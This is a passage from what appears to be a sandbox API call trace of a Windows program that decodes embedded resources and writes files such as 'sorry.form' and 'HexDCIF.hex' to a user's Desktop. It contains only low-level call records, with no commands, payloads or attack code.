(_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.968] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a682c8 [0077.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.968] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e8518 [0077.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e8518, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.968] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e8518) returned 0x21 [0077.968] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.968] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.969] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.969] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.969] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.969] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.969] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e8518 | out: hHeap=0x10e0000) returned 1 [0077.969] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682c8 | out: hHeap=0x2a60000) returned 1 [0077.969] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.969] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.969] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x33fc) returned 0x29932d8 [0077.969] GetLastError () returned 0x0 [0077.969] SetLastError (dwErrCode=0x0) [0077.969] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0077.969] wcslen (_String="\\") returned 0x1 [0077.970] wcslen (_String="Hexadecimal_Calculator.ns") returned 0x19 [0077.970] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a708, Size=0x6c) returned 0x2a6abc8 [0077.970] malloc (_Size=0x1bcc) returned 0x11224f0 [0077.970] free (_Block=0x11224f0) [0077.970] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns") returned 0x31 [0077.970] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x6c) returned 0x2a6ac40 [0077.970] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns") returned 0x31 [0077.970] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x6c) returned 0x2a6acb8 [0077.970] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.970] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.970] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6acb8 | out: hHeap=0x2a60000) returned 1 [0077.970] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.971] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.971] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0077.971] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0077.971] WriteFile (in: hFile=0x7c, lpBuffer=0x29932d8*, nNumberOfBytesToWrite=0x33fc, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x29932d8*, lpNumberOfBytesWritten=0x19fe60*=0x33fc, lpOverlapped=0x0) returned 1 [0077.972] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0077.972] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.972] CloseHandle (hObject=0x7c) returned 1 [0077.973] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.973] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac40 | out: hHeap=0x2a60000) returned 1 [0077.973] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29932d8 | out: hHeap=0x10e0000) returned 1 [0077.973] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns") returned 0x31 [0077.973] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x6c) returned 0x2a6ac40 [0077.974] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0077.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns" (normalized: "c:\\users\\fd1hvy\\desktop\\hexadecimal_calculator.ns"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0077.974] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0077.974] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0077.974] CloseHandle (hObject=0x7c) returned 1 [0077.974] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.974] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac40 | out: hHeap=0x2a60000) returned 1 [0077.974] GetLastError () returned 0x0 [0077.974] SetLastError (dwErrCode=0x0) [0077.974] GetLastError () returned 0x0 [0077.974] SetLastError (dwErrCode=0x0) [0077.974] GetLastError () returned 0x0 [0077.974] SetLastError (dwErrCode=0x0) [0077.974] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns") returned 0x31 [0077.974] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x6c) returned 0x2a6ac40 [0077.974] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x29932d8 [0077.974] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns", lpszShortPath=0x29932d8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\HEXADE~1.NS") returned 0x23 [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68168 [0077.975] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29932d8 | out: hHeap=0x10e0000) returned 1 [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HEXADE~1.NS") returned 0x23 [0077.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6ac40 | out: hHeap=0x2a60000) returned 1 [0077.975] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68168 | out: hHeap=0x2a60000) returned 1 [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] wcslen (_String="b2eincfile") returned 0xa [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] SetEnvironmentVariableW (lpName="b2eincfile7", lpValue="C:\\Users\\FD1HVy\\Desktop\\HEXADE~1.NS") returned 1 [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.975] GetLastError () returned 0x0 [0077.975] SetLastError (dwErrCode=0x0) [0077.976] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\Hexadecimal_Calculator.ns") returned 0x31 [0077.976] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x6c) returned 0x2a6ac40 [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.976] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0077.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sorry.form", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.976] malloc (_Size=0xc) returned 0x1121150 [0077.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sorry.form", cchWideChar=11, lpMultiByteStr=0x1121150, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sorry.form", lpUsedDefaultChar=0x0) returned 11 [0077.976] free (_Block=0x1121150) [0077.976] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.976] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a228, Size=0x5a) returned 0x2a6a1c0 [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.976] GetLastError () returned 0x0 [0077.976] SetLastError (dwErrCode=0x0) [0077.977] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a6a0, Size=0x5a) returned 0x2a6a228 [0077.977] FindResourceW (hModule=0x400000, lpName="5690144D725FBE718152119646904597454E4141", lpType=0xa) returned 0x0 [0077.977] FindResourceW (hModule=0x400000, lpName="1414E454795409646911251817EBF527D4410965", lpType=0xa) returned 0x859220 [0077.977] LoadResource (hModule=0x400000, hResInfo=0x859220) returned 0xa2a52c [0077.977] SizeofResource (hModule=0x400000, hResInfo=0x859220) returned 0xc195d [0077.977] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xc195d) returned 0x2e80020 [0077.988] FreeResource (hResData=0xa2a52c) returned 0 [0077.988] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x2e80020) returned 0xc195d [0077.988] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0077.988] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68218 [0077.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0077.988] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e8518 [0077.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e8518, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0077.989] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e8518) returned 0x21 [0077.989] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0077.989] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0077.996] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.996] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0077.996] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0077.996] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0077.996] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e8518 | out: hHeap=0x10e0000) returned 1 [0077.996] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0077.996] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0077.996] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0077.996] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x113f94) returned 0x2f5a020 [0078.019] GetLastError () returned 0x0 [0078.019] SetLastError (dwErrCode=0x0) [0078.019] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0078.019] wcslen (_String="\\") returned 0x1 [0078.019] wcslen (_String="sorry.form") returned 0xa [0078.019] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x4e) returned 0x2a6abc8 [0078.020] malloc (_Size=0x1bcc) returned 0x11224f0 [0078.041] free (_Block=0x11224f0) [0078.041] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\sorry.form") returned 0x22 [0078.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4e) returned 0x2a684d8 [0078.042] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\sorry.form") returned 0x22 [0078.042] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4e) returned 0x2a68218 [0078.042] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.042] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.042] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0078.042] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0078.042] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0078.043] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fe68*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fe68*=0) returned 0x0 [0078.043] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe4c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe4c*=0x0, lpOverlapped=0x0) returned 1 [0078.043] WriteFile (in: hFile=0x7c, lpBuffer=0x2f5a020*, nNumberOfBytesToWrite=0x113f94, lpNumberOfBytesWritten=0x19fe60, lpOverlapped=0x0 | out: lpBuffer=0x2f5a020*, lpNumberOfBytesWritten=0x19fe60*=0x113f94, lpOverlapped=0x0) returned 1 [0078.110] WriteFile (in: hFile=0x7c, lpBuffer=0x2a91200*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x19fe7c, lpOverlapped=0x0 | out: lpBuffer=0x2a91200*, lpNumberOfBytesWritten=0x19fe7c*=0x0, lpOverlapped=0x0) returned 1 [0078.110] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0078.110] CloseHandle (hObject=0x7c) returned 1 [0078.206] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.206] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a684d8 | out: hHeap=0x2a60000) returned 1 [0078.206] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x2f5a020 | out: hHeap=0x10e0000) returned 1 [0078.211] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\sorry.form") returned 0x22 [0078.211] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4e) returned 0x2a68110 [0078.211] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\sorry.form" (normalized: "c:\\users\\fd1hvy\\desktop\\sorry.form"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0078.211] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1000) returned 0x2a91200 [0078.211] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a91200 | out: hHeap=0x2a90000) returned 1 [0078.211] CloseHandle (hObject=0x7c) returned 1 [0078.211] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.211] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68110 | out: hHeap=0x2a60000) returned 1 [0078.211] GetLastError () returned 0x0 [0078.211] SetLastError (dwErrCode=0x0) [0078.212] GetLastError () returned 0x0 [0078.212] SetLastError (dwErrCode=0x0) [0078.212] GetLastError () returned 0x0 [0078.212] SetLastError (dwErrCode=0x0) [0078.212] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\sorry.form") returned 0x22 [0078.212] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4e) returned 0x2a687f0 [0078.212] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2710) returned 0x29932d8 [0078.212] GetShortPathNameW (in: lpszLongPath="C:\\Users\\FD1HVy\\Desktop\\sorry.form", lpszShortPath=0x29932d8, cchBuffer=0x2710 | out: lpszShortPath="C:\\Users\\FD1HVy\\Desktop\\SORRY~1.FOR") returned 0x23 [0078.212] GetLastError () returned 0x0 [0078.212] SetLastError (dwErrCode=0x0) [0078.212] GetLastError () returned 0x0 [0078.212] SetLastError (dwErrCode=0x0) [0078.212] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68218 [0078.212] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x29932d8 | out: hHeap=0x10e0000) returned 1 [0078.212] GetLastError () returned 0x0 [0078.212] SetLastError (dwErrCode=0x0) [0078.212] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\SORRY~1.FOR") returned 0x23 [0078.213] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a687f0 | out: hHeap=0x2a60000) returned 1 [0078.213] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68218 | out: hHeap=0x2a60000) returned 1 [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] wcslen (_String="b2eincfile") returned 0xa [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] SetEnvironmentVariableW (lpName="b2eincfile8", lpValue="C:\\Users\\FD1HVy\\Desktop\\SORRY~1.FOR") returned 1 [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\sorry.form") returned 0x22 [0078.213] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4e) returned 0x2a68110 [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] GetLastError () returned 0x0 [0078.213] SetLastError (dwErrCode=0x0) [0078.213] GetLastError () returned 0x0 [0078.214] SetLastError (dwErrCode=0x0) [0078.214] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0xe4) returned 0x2a911d0 [0078.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexDCIF.hex", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.214] malloc (_Size=0xd) returned 0x1121150 [0078.214] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HexDCIF.hex", cchWideChar=12, lpMultiByteStr=0x1121150, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HexDCIF.hex", lpUsedDefaultChar=0x0) returned 12 [0078.214] free (_Block=0x1121150) [0078.214] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.214] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a1c0, Size=0x5a) returned 0x2a6a0f0 [0078.214] GetLastError () returned 0x0 [0078.214] SetLastError (dwErrCode=0x0) [0078.214] GetLastError () returned 0x0 [0078.214] SetLastError (dwErrCode=0x0) [0078.214] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6a228, Size=0x5a) returned 0x2a6a430 [0078.214] FindResourceW (hModule=0x400000, lpName="B70E9511EA51B2A39E1AEB84AEE2ABEA36815BD2", lpType=0xa) returned 0x0 [0078.214] FindResourceW (hModule=0x400000, lpName="2DB51863AEBA2EEA48BEA1E93A2B15AE1159E07B", lpType=0xa) returned 0x859270 [0078.214] LoadResource (hModule=0x400000, hResInfo=0x859270) returned 0xaeefb0 [0078.214] SizeofResource (hModule=0x400000, hResInfo=0x859270) returned 0xda3b [0078.214] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0xda3b) returned 0x29932d8 [0078.215] FreeResource (hResData=0xaeefb0) returned 0 [0078.215] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x29932d8) returned 0xda3b [0078.215] wcslen (_String="E1496274842FB5E4729CE4A34ECC1471") returned 0x20 [0078.215] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x4a) returned 0x2a68480 [0078.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0078.215] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x21) returned 0x10e8518 [0078.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E1496274842FB5E4729CE4A34ECC1471", cchWideChar=-1, lpMultiByteStr=0x10e8518, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E1496274842FB5E4729CE4A34ECC1471", lpUsedDefaultChar=0x0) returned 33 [0078.215] RtlSizeHeap (HeapHandle=0x10e0000, Flags=0x0, MemoryPointer=0x10e8518) returned 0x21 [0078.215] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a911d0 [0078.215] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x418) returned 0x2a915f0 [0078.216] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.216] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911d0 [0078.216] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a915f0 | out: hHeap=0x2a90000) returned 1 [0078.216] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x0, Size=0x1c) returned 0x2a911f8 [0078.216] HeapFree (in: hHeap=0x10e0000, dwFlags=0x0, lpMem=0x10e8518 | out: hHeap=0x10e0000) returned 1 [0078.216] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68480 | out: hHeap=0x2a60000) returned 1 [0078.216] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911d0 | out: hHeap=0x2a90000) returned 1 [0078.216] HeapFree (in: hHeap=0x2a90000, dwFlags=0x0, lpMem=0x2a911f8 | out: hHeap=0x2a90000) returned 1 [0078.216] RtlAllocateHeap (HeapHandle=0x10e0000, Flags=0x8, Size=0x2f600) returned 0x2f50048 [0078.219] GetLastError () returned 0x0 [0078.219] SetLastError (dwErrCode=0x0) [0078.219] wcslen (_String="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0078.220] wcslen (_String="\\") returned 0x1 [0078.220] wcslen (_String="HexDCIF.hex") returned 0xb [0078.220] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a6abc8, Size=0x50) returned 0x2a6abc8 [0078.220] malloc (_Size=0x1bcc) returned 0x11224f0 [0078.220] free (_Block=0x11224f0) [0078.220] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.220] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a68480 [0078.220] wcslen (_String="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex") returned 0x23 [0078.220] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a683d0 [0078.221] RtlAllocateHeap (HeapHandle=0x2a90000, Flags=0x8, Size=0x28) returned 0x2a911d0 [0078.221] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexDCIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexdcif.hex"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.221] HeapFree (in: 